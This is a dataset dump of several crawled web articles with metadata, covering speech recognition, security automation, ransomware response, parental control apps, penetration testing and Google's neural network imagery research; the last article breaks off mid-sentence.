text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Speech recognition, also known as automatic speech recognition (ASR), computer speech recognition, or speech-to-text, is a capability that enables a program to process human speech into a written format. It is often confused with voice recognition, but speech recognition focuses on the translation of speech from a verbal format to a text one whereas voice recognition just seeks to identify an individual user’s voice. Natural language processing (NLP) Natural language processing (NLP) refers to the branch of AI that gives computers the ability to understand text and spoken words in much the same way human beings can. NLP combines computational linguistics with statistical, machine learning (ML), and deep learning models. Together, these technologies enable computers to process human language in the form of text or voice data and to ‘understand’ its full meaning, complete with the speaker or writer’s intent and sentiment. NLP can translate text from one language to another, respond to spoken commands, and summarise large volumes of text rapidly—even in real-time. It is very likely that you’ve interacted with NLP in the form of voice-operated GPS systems, digital assistants, speech-to-text dictation software, customer service chatbots, and other consumer conveniences. Uses of speech recognition Speech technology has been deployed in digital personal assistants, smart speakers, smart homes, and a wide range of other products. The technology allows us to perform a variety of voice-activated tasks. Apple’s Siri and Google’s Alexa use AI-powered speech recognition to provide voice or text support whereas voice-to-text applications like Google Dictate transcribe your dictated words to text. Typing with your voice allows you to speak emails and documents into existence by hitting the microphone option on your device’s keyboard. Voice search is the most common use of this technology. In 2021, it’s believed that 5 billion people will use voice-activated search and assistants around the world, a number that could rise to 6.4 billion in 2022.
<urn:uuid:5eb428db-fb7b-432f-b5e1-847bf891b277>
CC-MAIN-2022-40
https://aimagazine.com/technology/speech-recognition-and-ai-what-you-need-know
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00620.warc.gz
en
0.915187
431
3.609375
4
The human brain is magnificent in its ability to process information. However, compared to advances in artificial intelligence and automation (which never sleep), it pales in its ability to keep up. The truth is, while some cybersecurity tasks must be performed by humans, there are some things that machines can accomplish that humans can't. When used in the areas where it shines, automation can be a priceless tool in the effort to achieve effective cybersecurity. Utilized in specific processes, automation can improve threat detection capabilities, decrease incident response time, and reduce or eliminate errors. Furthermore, automated tools and systems can address many of the issues creating challenges for cybersecurity professionals in the current threat landscape. Quality automated systems that are properly optimized to your network environment have the capability to alleviate the stress on short-staffed teams, reduce burnout, and address constant network growth. Now, more than ever before, cybersecurity professionals need cybersecurity tools and systems that decrease the workload while increasing accuracy. How Is Automation Used in Cybersecurity? Automation is used in different aspects of cybersecurity to complete tasks that are redundant, can't be effectively completed by humans, or can reduce human error. Automated cybersecurity solutions can complete time-consuming tasks that take up the time of cybersecurity professionals, allowing them to focus on high-value tasks. It can also improve speed and accuracy in specific tasks. Automation significantly improves the ability of cybersecurity teams to accurately detect and rapidly respond to active threats. These are some of the most effective ways automation is used in cybersecurity. Log Collection and Monitoring Any business network is made up of multiple devices that complete hundreds of tasks each day. For every action that takes place on your network, an event is logged. By monitoring these logs, your security team can learn about the activity that occurs on your network. However, the task of collecting mass amounts of data, parsing it into categories, and analyzing it for unusual activity is impossible for a single data analyst or even a large group of analysts. An automated log monitoring system collects the data, parses it into categories, and normalizes the data so it is easily readable. From there, machine learning can be used to establish a baseline of normal behavior for each user. When activities occur that fall outside of this baseline, an alert is generated. This automated activity occurs in real-time, only taking seconds for each action to occur. Log monitoring is one of the most vital processes for effective cybersecurity. By automating the process, you can keep up with network activity in real-time and provide your data analysts with information relevant to the security of your business. Intercept Phishing Attempts Despite the fact that it's been a primary way for businesses to communicate for decades, 91% of all cyberattacks begin with an email. In 2021, 96% of organizations were targeted by an email-related phishing attempt. Unfortunately, human error is a major factor in successful email attacks. In fact, 85% of breaches include a human element, and 61% are related to stolen or misused credentials. Today's sophisticated phishing and business email compromise (BEC) attacks can generate fraudulent emails that are practically identical to legitimate brand or company emails. Automated interception actions are the best way to avoid becoming the victim of a phishing attack that provides a hacker with an entryway into your network. An automated SOAR system begins protecting against phishing attempts at the log monitoring level with alerts based on IP addresses, URLs, attachments, or other fraud indicators. Since SOAR is designed to orchestrate security tasks into a consistent system, alerts can be used to launch a series of actions to intercept phishing emails before they reach their target. Without automated response, an alert would be sent to data analysts for investigation. It would then be prioritized in a long list of other potential threats, ranked by level of danger and importance. Conversely, an automated SOAR system can be 'taught' to respond to phishing attempts in a specific way. As a result, phishing attempts are intercepted in real-time, and in many cases, never received. Recognize Internal Threats Traditional cybersecurity systems depended on protecting an organizational network perimeter with tools like firewalls and antivirus software. While keeping threats out of your network is always an important goal, today's sophisticated threats make it impossible to assume your organizational network will never be breached. Internal threats are risks that are already lurking within your organization's network. While these threats can come from bad actors within your company, they often begin as external threats. Internal threats are always more difficult to detect because they mimic legitimate behavior. An automated SOAR system that begins with log collection includes knowledge of normal behavior within your network. This knowledge, called user and entity behavior analytics (UEBA) is used to generate alerts when a seemingly legitimate network user performs activities that could represent a threat. Flagging and responding to these actions in real-time is critical to reducing the dwell time an attacker spends in your network. With the use of automation, an attacker can be recognized and the activity halted before the attacker reaches their objective. Find and Address Vulnerabilities Cyber attackers work tirelessly to find flaws in software or organizational processes that can be exploited to create a vulnerability that allows malicious entry. Thousands of types of software exist, and hundreds of various vulnerabilities are uncovered each month. To effectively keep up with the speed of evolving threats manually, even a small business would require a team of experts dedicated to searching for vulnerabilities around the clock. Such a process would require analysts to spend countless hours examining complex data for indications of a vulnerability that could allow hackers to access your network. The task would be incredibly time-consuming and manual labor intensive. Considering the drudgery and repetitive nature of the task, the potential for human error is high, and increased dwell time is likely. Conversely, automated scanning works in the background of your network in real-time reducing the potential for dwell time and eliminating human error. A vulnerability scan is a high-level automated test that searches for known vulnerabilities within your system and reports them. Some scans can identify as many as 50,000 known weaknesses that can be exploited by hackers. Ransomware attacks rose by 92.7% in 2021 compared to 2020 levels, with 1,389 reported attacks in 2020 and 2,690 in 2021.(1) Malware, including ransomware, is typically introduced to business networks through seemingly innocuous methods of data sharing and business communications, like document sharing and email. To humans, these downloads appear safe. Technically, there is no way to manually ensure a file won't be malicious upon opening. Automated anti-malware tools identify known and previously unseen malicious files or actions, then launch a series of response actions to prevent the files from being opened or downloaded. The process begins with a real-time analysis that automatically checks the file, plugin, or sample to see if it's a threat. If a threat is detected, an alert is sent out and the offending file is quarantined. Depending on the threat and the tools used for the process, the file then may be opened in a restricted environment like a sandbox. Reduce Dwell Time Some of the most common attacks used by hackers depend on discretion for success. Phishing, business email, compromise, and credential theft are some of the most common ways hackers access your network to move laterally within the systems and gain access to more power and sensitive data. These attacks mimic legitimate behavior in your network to allow hackers to stay hidden in your network. Since modern sophisticated threats depend on discretion, they are by nature, difficult to detect by humans. Furthermore, it's impossible for humans to monitor massive amounts of network data in real-time. An automated SOAR system monitors data in real-time and uses UEBA to detect suspicious behavior. Upon detection, an alert is sent out and a series of incident response actions is immediately launched. These actions can work to quarantine the threat, shut down affected devices or offer additional actions to mitigate the threat. 5 Reasons You Should Implement Security Automation Now - Reduces Alert Fatigue - Eliminates Burnout - Improves Response Time - Addresses Staff Shortages - Reduces the Severity of an Attack The cybersecurity landscape is more complex than ever before. The number of cyberattacks launched each year is growing exponentially. Cybercrime has become a global enterprise where criminals can buy and sell illegal products designed to successfully infiltrate business networks. Attackers can even utilize automation to carry out mass attacks against multiple institutions at once. As a result, threat actors with little to no experience can carry out successful attacks. This low barrier to entry for cybercrime allows more bad actors to participate. More attackers and more attacks have cybersecurity teams stretched thin and facing seemingly insurmountable challenges. Automation can help alleviate the extra strain placed on internal teams by addressing these pressing issues. Reduces Alert Fatigue Professionals in the cybersecurity industry are required to be on high alert at all times. The effects of the pandemic on the workforce introduced a plethora of new responsibilities into the field which increases the number of alerts coming at analysts from all angles. In a survey, 93% of respondents claimed they could not address all the alerts they receive in one day.(2) For short-staffed teams, a high volume of alerts is impossible to process and requires constant prioritization. Analysts spend as much as 75% of their time investigating false positives.(3) When the majority of alerts don't represent an actual threat, professionals grow numb to the alert process. This desensitization leads to missed or ignored alerts that can leave your network vulnerable to an attack. In fact, a recent report revealed that companies with 500-1,499 employees ignore or don't investigate 27% of all the alerts they receive. While a large number of alerts plays a part in alert fatigue, it isn't the only culprit. In poorly optimized systems, alerts are typically very similar and offer little context of the potential danger to an organization. These undefined threats look practically identical and seem redundant. Even worse, when systems and tools are not integrated, many alerts actually are redundant. When properly optimized, an automated cybersecurity solution can address all the contributors to alert fatigue. Automated SOAR begins with targeted log monitoring. that accurately detects suspicious behavior. Redundant alerts are eliminated, decreasing the sheer number of alerts. Context can be applied to alerts that clearly define why a specific event is a threat to your organization. Instead of a deluge of vague threats, analysts get automatically prioritized alerts with vital contextual information and response guidance. Repetitive tasks and high-stress work environments are some of the leading causes of burnout. These factors are an ongoing part of working in cybersecurity. Pandemic pressures have increased pressures in the industry, with 80% of cybersecurity professionals feeling more stressed in their roles. This increased stress leads to increased burnout and increased turnover. Cybersecurity teams grow even smaller, leading to more burnout and creating a vicious cycle. With that knowledge in mind, it might seem like eliminating burnout in cybersecurity would be an impossibility. However, by tackling the direct causes of burnout, automation can help relieve the strain placed on cybersecurity professionals. The causes of burnout in cybersecurity range from heavy workloads and long hours to poor processes and user pushback. By implementing automation in areas where AI-enabled software can outpace human performance, you can decrease workloads, improve efficiency, and free up professionals to concentrate on high-value tasks. The process begins with automated SIEM that monitors network activity. UEBA establishes a baseline to define normal network behavior. These tools accurately detect threats and add contextual information to limit the number of alerts received by analysts. Automated security orchestration and response (SOAR) generates automatic incident response processes and remediation procedures to respond to low-level security events. Central threat intelligence (CTI) automatically updates threat feeds that protect organizational networks from known threats and vulnerabilities. By implementing these highly effective automated cybersecurity systems, you can reduce the heavy workload placed on cybersecurity professionals. Automation and AI never sleep, which means your cybersecurity teams can. Long hours, excessive overtime, and always being on call generate unhealthy stress levels that lead to burnout. As automation addresses all of these concerns, burnout among cybersecurity professionals is reduced. Improves Response Time In the effort to eliminate threats from your network, detection is only half the battle. Your effective response is critical in limiting the amount of time that hackers have access to your network. According to the IBM Security Cost of a Data Breach Report, 2021, the average time to identify and contain a breach is 287 days.(4) Extended dwell times can significantly impact the severity of a successful cyberattack. Successful incident response depends on several critical factors. Teams must have the capability to investigate data to determine the severity of an attack. Specific actions must take place instantaneously to contain the threat to avoid further damage. Remediation must take place as soon as possible to eliminate the expenses of downtime. Automated security orchestration and response systems work in multiple ways to address these requirements. Security orchestration gathers information from multiple systems and connects the information to define a single incident. Low priority alerts trigger automated response actions to contain or eliminate the threat. Automated responses take the place of slower manual operations. Aggregated reports provide clear details for a seamless investigation that provides additional information about the threat environment. As a result, the mean time to detection and the mean time to respond are both reduced considerably, limiting the damage that can be done to your network. Addresses Staff Shortages In the US, 465,00 cybersecurity positions are currently unfilled. 67% of security professionals say they don't have enough talent on their team, and 17% say it feels like each person is doing the workload of three. Even with exemplary recruitment tactics and outstanding salary and benefits packages, successfully filling empty positions in cybersecurity is a challenge. Unfortunately, there is no immediate solution to fill the gap. However, automated cybersecurity solutions can reduce the requirements placed on cybersecurity teams so the need isn't as great. It's true that automation will never replace trained human professionals in cybersecurity. However, when automation is combined with the skills of professionals, teams can accomplish more effective threat detection and response with less time and effort. When properly optimized, automated systems provide security teams with more information about potential risks and vulnerabilities. Crowd-sourced data is automatically gathered by the system and used prompt actions (like updates and patch applications) that eliminate existing vulnerabilities. Automated log monitoring improves threat detection efforts by orchestrating data monitoring from multiple tools to eliminate redundant alerts and apply context to every alert. As a result, the manual efforts required from cybersecurity experts are significantly reduced. When alerts are designed to automatically trigger specific response actions, an attack can be immediately contained, further reducing the manual tasks required by data analysts and engineers. When automation is deployed to cybersecurity workflows, the requirements for cybersecurity professionals to spend time on manual and repetitive tasks are eliminated, allowing them to spend time on higher-level tasks. Automated tools and services reduce the workload for your existing cybersecurity team members, allowing them to accomplish more in less time. Reduces the Severity of an Attack At the end of the day, the severity of an attack makes all the difference between a minor incident and a catastrophic blow to your business. IBM's Cost of a Data Breach Report, 2022, revealed that the average cost of a data breach is at an all-time high.(5) Data breach average cost increased 2.6% from $4.24 million in 2021 to $4.35 million in 2022. The report also reveals that security AI had the biggest cost-mitigating effect on attacks, with the average breach costing up to $3.05 million less at organizations with it than those without it. Cybersecurity automation offers improved detection, limits dwell time, and speeds response time. Each of these capabilities works to significantly decrease the severity of a potential attack on your business network. In the modern cyberthreat landscape, it's no longer enough to wait and hope that external protections are sufficient. Effective cybersecurity depends on automated systems that can process data in real-time and provide complete visibility into the actions that are currently taking place in your network. Automated cybersecurity systems provide highly skilled cybersecurity professionals with the tools necessary to keep up with the pace of modern technology. As a result, cyberattacks can be detected and contained before damage is done to your network. Implement Security Automation for a Secure Modern Network Businesses depend on technology to improve production and performance. The average business network is continually growing to keep up with changing workforce requirements and consumer demand for convenience. Modern hackers utilize technology and automation to conduct advanced attacks on business networks with higher success rates and increased speed. Security automation has evolved to provide cybersecurity professionals with the power to analyze data in real-time and detect sophisticated threats designed to discreetly infiltrate company networks. Automated orchestration and response capabilities improve the interaction of cybersecurity tools to provide automatic response and remediation actions at the speed attacks actually occur. When your teams have these tools to detect and respond to the continual deluge of attack attempts, manual labor and redundant tasks are reduced, allowing cybersecurity professionals to use their education and experience to perform high-level tasks that eliminate vulnerabilities and reduce risk potential. The result is an overall improvement in cybersecurity posture and the ability to detect and eliminate threats. If you're new to cybersecurity automation, the sheer number of tools available can make it difficult to determine how to make the most of your budget. Learn more about the implementation process by watching our on-demand webinar: Optimize Your Security Posture by Combining the Power of Automation With Human Intervention.
<urn:uuid:f4ecb0a6-05e3-4d76-8d82-a2f739f6a429>
CC-MAIN-2022-40
https://www.bitlyft.com/resources/5-reasons-to-implement-security-automation-now
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00620.warc.gz
en
0.941006
3,631
2.9375
3
There have been many major ransomware attacks in 2021. Bangkok Airways, Acer, the Brazilian National Treasury, and the Spanish government made the news this year. Here’s a look at the What are ransomware attacks and why are they on the rise? What is ransomware? Ransomware is a type of malware (malicious software), that holds the data on your device to ransom. If your computer system is affected by ransomware, your data and applications may be encrypted such that you no longer have access to them. At this point, the attacker demands a ransom in return for restoring access to the system. Unfortunately, in most instances, the system is not restored even after the demands are met. In the recent past, ransomware attacks worldwide have significantly increased. A new organisation has become a ransomware victim almost every 11 seconds in 2021. Most attackers demand huge amounts of money the form of bitcoin due to the ease of online payment and to maintain anonymity. While ransomware attacks can target firms of any size, smaller companies tend to have a tougher time recovering from this breach in cybersecurity. How ransomware works Here’s what happens during a ransomware attack: - Malware received Individuals receive the ransomware in the form of an infected application as an email attachment. Typically, ransomware and other malware is triggered from phishing/spam emails. - Malware installed Once you download the application to your system, it installs itself on the system as well as any other accessible devices on the same network. - Connects with cybercriminals The application contacts the cybercriminals to generate cryptographic keys for the infected system. The application crawls through your system and encrypts all the files it finds. You can no longer access any file on your system. - Ransom demand The application displays a message on the system stating the demands of the attack and payment instructions. - System restoration/destruction You may be able to restore the affected devices with stored backup data. Cybercriminals may or may not restore the system after the payment is completed. If you are unable to restore the system or meet the ransom, you have probably lost the data and information for good. Why are ransomware attacks rising? - For cybercriminals, this is a quick way to make a lot of money. A single application can send emails to thousands of people and there is a high chance of someone opening one. - Malicious applications are being sent in the form of Covid-19-related information such as information regarding vaccines and sanitizers. These click-baits are more likely to hook people. - The pandemic has caused a spike in Internet usage. This gives the criminals a wider target audience. - It is almost impossible to track cryptocurrency transactions making it much easier for cybercriminals to hide their tracks. - Paying the ransom (even though you may see no other choice) incentivizes criminals to find more victims to extort money. It is likely this has encouraged cybercriminals to increase the ransom amount with each attack. Cybersecurity measures to take during ransomware attacks While ransomware attacks can happen due to a simple mistake, they can cause significant damage to a company. By following some simple cybersecurity rules, you minimise attacks. But what would you do if your system is affected? Step 1: Restrain the situation Turn off the network connectivity to this system so that other devices in the network aren’t affected. Make your colleagues/staff and the IT department aware of the situation. The safest thing to do at this point would be to turn off the network completely before more devices are affected. Step 2: Assess the systems Analyze all systems in the network to find ones that have been affected by the malware. During this search, you could also find systems that haven’t been affected in any way. While other devices have to be restored, you can use unaffected devices to continue your business. Step 3: Assess the backups A good cybersecurity measure is to have a backup and recovery system in place for your organization. If you have such systems, assess their state to see if they are compromised. Step 4: Inform the team and stakeholders Let your staff and stakeholders know what’s happening. This could include the ransom demands, chances of recovery from backup logs, expected downtime, etc. Step 5: Recover your systems Using the backup logs, recover each system affected by the ransomware. The IT team should be able to run scripts to identify affected files and replace them individually as well. Conduct thorough reviews to ensure that all malware is eradicated before restoring the network. With the rise of ransomware attacks, the importance of cybersecurity is now higher than ever. Taking the right measures and being aware of these threats is necessary to avoid such attacks. But you never know how or when these incidents can occur. The best measure against ransomware attacks is to have a reliable backup and recovery system in place. - Ransomware explained: How it works and how to remove it - 2021 Cyber Security Statistics. The Ultimate List Of Stats, Data & Trends - Ransomware: Paying Cyber Extortion Demands in Cryptocurrency - Why ransomware attacks are on the rise — and what can be done to stop them - What is ransomware and how to help prevent ransomware attacks - Ransomware protection: how to keep your data safe in 2021
<urn:uuid:304003b2-1182-40cc-ab10-632d7ca018fd>
CC-MAIN-2022-40
https://news.networktigers.com/industry-news/why-are-ransomware-attacks-on-the-rise/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00620.warc.gz
en
0.938844
1,115
3.25
3
To protect your child from prevalent online hazards such as: cyberbullying, online predators, and sexting, you need to teach your kids digital etiquette. Use parental control apps to let them understand how to use social media responsibly. Being surrounded by electronic gadgets since birth, kids know the devices like the back of their hands. Technology can be a great resource for education and entertainment for children, but parents should also consider the health implications of screen time. Parents, with the help of child monitoring apps, can teach their kids the ways of being in control of tech-life balance. The following are a few points to keep in mind while establishing family guidelines for safe and satisfying technology use. We created this list of tips especially for those of you who wish to know how to teach your kids to use digital media properly. Parenting tips for promoting healthy technology use among children Do not overreact Whether we like it or not, technology is an indispensable part of our modern world. Setting overly restrictive limits on child never helps in the long run. Instead, it would send a message that technology is something to fear, which it is clearly not. Try to keep yourself in your child’s shoes and ask yourself – how would you feel if you request an elder for anything and all you get is a ‘no’ most of the time? Let your kids have experience in the digital media, make them understand the correct way to proceed by being there for them. Overreacting is never a good idea when you know how to teach your kids to use digital media properly. The focus should be on teaching healthy habits that will stay with your child for a lifetime. And kid’s safety apps help you achieve that. Teach kids about technology from an earlier age Yes, it is essential to teach them about technology when they are young. It does not mean handing over the gadgets to pacify them when they are just toddlers. When they reach a certain age, they gradually introduce them to the devices. First, explain that tablets, computers, and other gadgets are not toys and should be handled with care. Discuss the benefits of technology as well as the risks without frightening them. Let your kids know the importance of respecting privacy and protecting personal information by applying proper privacy settings. And as they grow older, conversations should become more detailed. Lead by example Children are like sponges; they absorb from the surroundings, and parents are someone who can influence them the most. If you just keep preaching without following your words, you can imagine what impression your child would get! When your child is trying to converse with you, and you reply mindlessly staring at your phone, they would get the impression that the smartphone enjoys a priority over them. Be attentive and let them know people mater, not the phones. Be a good judge You need to use your judgmental skills, whether it is about your child’s maturity or the situation when they are demanding the use of it. No one knows your child better than you. Screen-time limits are a good idea at times, but you need to consider the context when establishing technology-rules for your family. Video calling with family members is different from playing a video game. The world won’t end if you are entertaining your preschooler because the situation wouldn’t allow you to do anything else. If they are doing research for a school assignment, or they are gathering more knowledge across the web for something of their interest, it wouldn’t be wrong to let them use the device. With child monitoring apps, prohibit your child from accessing inappropriate content. Keep updating yourself As a parent, it is your responsibility to prepare your child for their future. You need to be aware of the ever-evolving technology to teach them how to work within social boundaries and to continue to discover how society works. Children, by nature, are comfortable with the technical side of the online world. Still, they have to understand that the internet, being a public place, requires the enforcement of some privacy settings to ensure their reputation remains intact. Parents need to guide, educate, and support the children with an understanding of their world and a clear perspective of all they face. Get accurate parenting advice with parental control apps. Regulate kid’s bedtime According to research, the blue light emitted from smartphones stifles the natural production of the sleep hormone – melatonin. So, physicians recommend that screens should be avoided at least an hour before going to bed. It is better to set a rule for elders as well as children that no device should be allowed in the bedroom. Going to bed on time regulates a child’s body clock, which helps them to have a regular schedule. Maintain your child’s schedule with the help of kid’s safety apps. Be attentive to their online activities When kids are younger, you can easily monitor what they’re doing online. As they grow, it gets difficult. Parents should have honest discussions about what sites and content are off-limits. Look into the media your child is using, and check out your child’s browser history to see what sites they visit. Enforce digital etiquette Teach your child a basic set of rules pertaining to behavior that needs to be followed to ensure the safety and integrity of every internet user, including them. They need to understand the use of good manners in online communication such as email, forums, blogs, and social media. With the facility to stay behind the screens, people often say things online that they would never say to someone’s face. There is a rise in the number of teens who have witnessed cyberbullying. Talk to your children about the importance of being considerate and respectful in their digital interactions. Talk about digital decision-making It is difficult to ascertain whether some websites offer reliable information or not. Talk to your child about ways to evaluate authenticity and accuracy online. Explain why they should refrain from downloading unfamiliar programs, or clicking on suspicious links, or sharing personal information on unknown apps or websites. Also, ask them not to respond to messages from strangers. Before learning how to teach your kids to use digital media properly, it’s important to teach them to trust you. Encourage them to approach you if they ever witness cyberbullying or other troubling information online. Some kids prefer to spend more time online than playing with friends in real life. Tell them, digital friendships can never replace real friends. Help your child to nurture their real-life relationships. Invest in a parenting control app Bit Guardian Parental Control helps you monitor your child’s online activities. It is a godsend for parents who are apprehensive about their children’s safety in the digital world. Parental control apps allow parents to block inappropriate apps, to limit the screen time, to set a geofence around a child, and many more. You can also block anonymous, unwanted, spam calls, or calls from known numbers. Bit Guardian Parental Control is a child monitoring app that permits you to filter or restrict access to content on a child’s phone that’s off-limits. It comprises of various features that are mentioned above. Now we know that refraining the kids from using the devices is not an option. It would be like stripping them of fun and entertainment, and more importantly, personal growth, as well as skill-building, get compromised. Parents who know how to teach their kids to use digital media properly can create a safer digital world for their precious ones. Just be present and guide your child by downloading a parental control app for android.
<urn:uuid:5734257c-be05-4009-9fa9-1cea95cd256f>
CC-MAIN-2022-40
https://blog.bit-guardian.com/how-to-teach-your-kids-to-use-digital-media/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.948758
1,585
3.375
3
Why penetration testing is important Cyber security has become a major concern for all organisations, especially with the increase of remote working and working from home. One successful cyber attack can lose your business and destroy customer trust. It is, therefore, more important than ever to carry out vulnerability scans and penetration testing. Penetration testing, or pen testing, is a core element in your cyber security policy. From reading this article, you’ll understand the importance and benefits provided by pen testing. What is penetration testing and why is it important Penetration testing is a way of checking your IT system by attempting to break through some or all of your system’s security, using the same techniques as a hacker might. It’s like a third-party audit that assures you your company’s cyber security processes are up to scratch. Ideally, the tests should verify what you already know or suspect. However, using experienced pen testers can often reveal more subtle issues your internal IT staff may not be aware of. This is why why penetration testing is required. You can use pen testing to improve your company’s internal vulnerability assessments and management processes and risks. Penetration testers can perform a wide range of testing, which we’ll look at below, including: - Whitebox penetration testing - Blackbox penetration testing - Greybox penetration testing - Vulnerability testing - Web application testing - Mobile application testing - Automated penetration testing Types of penetration testing Pen tests vary in their approach and the weaknesses they try to exploit. Your specific situation and requirements will determine the best approach and extent of the testing. Whitebox penetration testing This is where the pen tester is fully aware of all your network and system information. They’ll have full knowledge and access to any source code and your network environment. Therefore, whitebox tests can often be more in-depth, providing more targeted, detailed results. Blackbox penetration testing In this case, no information is provided to the test at all. It can be seen as the most authentic as it demonstrates how an attacker with no inside knowledge may target your business systems. Greybox penetration testing As the name suggests, greybox testing is somewhere between white and black testing. It’s where only limited information is shared with the tester. This might be login details, for example. Greybox penetration testing is often used to highlight the level of access a privileged user can gain and the potential damage they could cause to your systems. It’s also used to simulate a cyber attack that has breached your network perimeter. What’s the difference or relationship between vulnerability testing and core penetration testing? Vulnerability testing or scanning evaluates security risks in your software systems to reduce the probability of threats. It looks for vulnerabilities in your IT systems and reports potential issues. Penetration tests go a step further – they exploit these vulnerabilities in your network and report the level to which a hacker may gain access. A vulnerability scan is usually automated, whereas a pen test is often performed manually. Web application testing As web technologies and web applications advance rapidly and they become increasingly integral to our daily lives, there’s even more exposure to cyber security risks through these web applications. Web application pen testing is the process of identifying vulnerabilities in your company software or website, for example. These vulnerabilities may arise through insecurities in the design, coding and publishing stages of the web application. Web application testing can check for things like: - Secure user authentication - Weaknesses in your website code and structure - Secure configuration of web browsers - Web server and database server security testing Mobile application testing iOS and Android apps can throw up a unique set of security risks compared to desktop apps. For example, the design and implementation of the mobile app itself, plus any APIs it uses will need to be tested. Protection from data theft by other applications on the device or the device user (think payment information or apps that offer in-app purchases) becomes an issue. Pen testing mobile applications can also discover and exploit security vulnerabilities in your apps functionality or your software development lifecycle, for example. Automated penetration testing As hackers become more sophisticated than ever before, it becomes increasingly difficult for you to know where your cyber security vulnerabilities are. At BlueFort we try to mimic hackers’ techniques. This involves automated penetration testing, to continuously stress test and validate your cyber security controls. Here at BlueFort, we partner with the recognised market leaders PCYSYS to provide an automated penetration testing solution. You can also watch an example of our live automated penetration using PenTera here Importance of penetration testing Easy. Cyber security is essential for your business. You don’t want to suffer: - a loss of business data, - a leak of sensitive information or - a lack of customer trust. And penetration testing is a crucial part of cyber security. Therefore, pen testing is vital for the security of your business IT systems, network, servers, devices and web applications. Let’s look at some of the benefits of penetration testing. Penetration testing benefits Your IT infrastructure covers your entire network, mobile devices, Virtual Private Networks (VPN), remote access, servers, databases, desktop computers, even networked scanners and printers. Pen testing your infrastructure is an essential step in keeping the security of your employees, company resources and customers fully protected and intact. And as your infrastructure evolves, you need pen testing to ensure new vulnerabilities are dealt with. Existing cyber security assessment As your company systems evolve and cyber attacks become ever more sophisticated, you must continually assess your cyber security. A pen test will show how well you’re protecting the data and infrastructure specifically targeted by the test. Various regulations and standards have components specifically related to system auditing and security. Here are some examples: - PCI DSS (Payment Card Industry Data Security Standard) - Set up to help businesses process card payments securely. - It states regular penetration testing is required to identify security issues. - ISO 27001 - Performing a penetration test is an essential part of ISO 27001 compliance. - ISO 27001 says that “Information about technical vulnerabilities of information systems being used shall be obtained in a timely fashion, the organisation’s exposure to such vulnerabilities evaluated and appropriate measures taken to address the associated risk.” - GDPR (General Data Protection Regulation) - This is the data privacy and security law that provides greater protection and rights to EU individuals and their personal data. - It states there should be a “…process for regular testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing”. Cyber security risk assessment Pen testing will detect, discover and assess security risks before they are exploited by an attacker. For example, insecure data storage might contravene GDPR as described above, so pen testing can be used to pick up these crucial weak spots. Identify security enhancements Pen testing is vital for ensuring your IT systems and digital assets are tested for any security flaws. BlueForts penetration test services are carried out by experienced, expert security consultants. They’ll assess the vulnerabilities and provide comprehensive advice to improve your security. Mobile app data leakage identification Pen testing can identify where mobile apps make user data vulnerable to access from other apps or hackers. As mobile apps often handle sensitive information or are a gateway to your backend system, they are perfect targets. Therefore, mobile app security is vital – from their development processes to deployment. Authorisation and authentication issues revealed The three-step security process of identifying, authenticating and authorising ensures that individuals accessing corporate data and systems are who they say they are. But are there weaknesses in your system? Have out-of-the-box default settings been left in place? There’s an issue right there. Pen testing, of course, can target and pick up authorisation and authentication issues in your network perimeter and internal systems too. When to conduct penetration testing So, the big question. When should you pen test and how often? Well, it’s not a one-off task. Many factors can influence your pen testing schedule, including budget size and availability. Generally, pen testing is typically used: - Before an application or system is deployed. - When a system has stabilised and isn’t being constantly changed or updated. - Before apps and systems are used in mission-critical applications. How often you carry out pen testing depends on a few factors, such as: - Company size. Bigger companies may be seen as more attractive to hackers. - Budget. Pen tests can be expensive. Therefore, a small budget might mean you pen test once every couple of years. - Regulations and compliance. Depending on your industry, you may be required to perform testing to meet certain regulations. - Infrastructure. If all your infrastructure is essentially in the cloud, your provider may already conduct pen tests internally. Remember, you can watch an of BlueFort’s live automated penetration testing here. By now you will have got the message – penetration testing is vitally important for businesses. You need a company that has years of experience and real expertise in conducting effective penetration testing. It can be a bit of a minefield.
<urn:uuid:0a63c4dd-7182-450b-8580-62c2fb6da567>
CC-MAIN-2022-40
https://www.bluefort.com/news/latest-blogs/why-penetration-testing-is-important/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.91486
1,959
2.59375
3
Google researchers last month reported progress in advancing the image classification and speech recognition capabilities of artificial neural networks. Image classification and speech recognition tools are based on well-known mathematical methods, but why certain models work while others don’t has been hazy, noted software engineers Alexander Mordvintsev and Mike Tyka, and software engineering intern Christopher Olah, in a blog post. To help unravel the mystery, the team trained an artificial neural network by showing it millions of images — “training examples” — and gradually adjusting the parameters until the network was able to provide the desired classifications. They applied the process, dubbed “inceptionism,” to 10 to 30 stacked layers of artificial neurons. The team provided an image, layer by layer, until the output layer was reached. The final layer provided the network’s answer. The software was able to build up an idea of what it thought the object should look like. The results, in a word, were surprising. Instead of producing something resembling actual objects, the network added components and refined the images in ways that often resembled modern art. Creative and Original Thought The research was important, because it enabled training of the network, the Google team noted. In some cases, it allowed the researchers to understand that what the neural net was looking for was not the thing they expected. Moreover, the team discovered that each layer dealt with features at a different level of abstraction, which often resulted in complexity, depending on which layers were enhanced. The inceptionism techniques could help researchers understand and even visualize how neural networks are able to carry out various classification tasks. A better understanding of how the network learns through the training process could lead to improvements in network architecture. “This is about creativity; coming up with something new from complete randomness,” said Roger Entner, principal analyst at Recon Analytics. “This is how we are able to give the computer’s AI a new idea,” he told TechNewsWorld. “We basically begin with something almost random and impose our order and it — and through this it is able to create something new,” Entner explained. “In this way, it is about original thought — creativity and original thought.” Not So Abstract One unforeseen benefit of the study could be the development of a new tool for artists to remix visual concepts, the researchers suggested. The result could be interesting — perhaps disturbing — abstract images, but the potential doesn’t end there. “This is about how we use databases to teach computers to learn,” said Jim 